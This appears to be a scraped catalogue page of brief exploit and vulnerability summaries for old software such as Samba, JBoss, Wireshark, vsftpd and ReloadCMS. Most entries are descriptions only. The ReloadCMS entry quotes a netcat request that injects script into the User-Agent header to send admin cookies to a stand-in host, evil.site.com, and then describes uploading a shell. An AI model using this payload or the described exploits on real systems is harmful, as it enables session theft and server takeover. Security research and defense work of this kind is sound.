The mpg123-0.59r program is vulnerable to a denial of service attack. When playing a specific evil song, the program crashes due to a SIGSEGV signal. The exact cause of the vulnerability is unknown and further investigation is required.
This module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5.
This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. The Samba developers report this as: 'Bug in the length checking for encrypted password change requests from clients.' The bug was discovered and reported by the Debian Samba Maintainers.
This module can be used to install a WAR file payload on JBoss servers that have an exposed 'jmx-console' application. The payload is put on the server by using the jboss.system:BSHDeployer's createScriptDeployment() method.
ReloadCMS do not properly sanitize User-Agent request header before to store it in stats.dat file. Example of an attack, through netcat: rgod>nc target.host.com 80 GET /path_to_reloadcms/ HTTP/1.0 User-Agent: "><script>window.open("http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL);window.close();</script> Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once grab.php script captures admin cookie, the script itself can upload a shell trough filemanager, launch commands and write output to a logfile also, inside cookies, there is admin MD5 password hash
This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the "unix/cmd/generic" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows.
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.
This exploit allows an attacker to include local files on the target system
The text describes two vulnerabilities in the MySms v1.0 application. The first vulnerability is an Authentication Bypass, which allows an attacker to bypass authentication by using a specific input. The second vulnerability is Cross-Site Request Forgery (CSRF), which allows an attacker to perform unauthorized actions on behalf of a user.
This is a proof-of-concept code for exploiting the CVE-2011-0762 vulnerability in vsftpd. The vulnerability allows remote attackers to cause a denial of service (DoS) by sending a specially crafted command to the FTP server. The affected version is 2.3.2, and the fix is available in version 2.3.4.
Services By CQR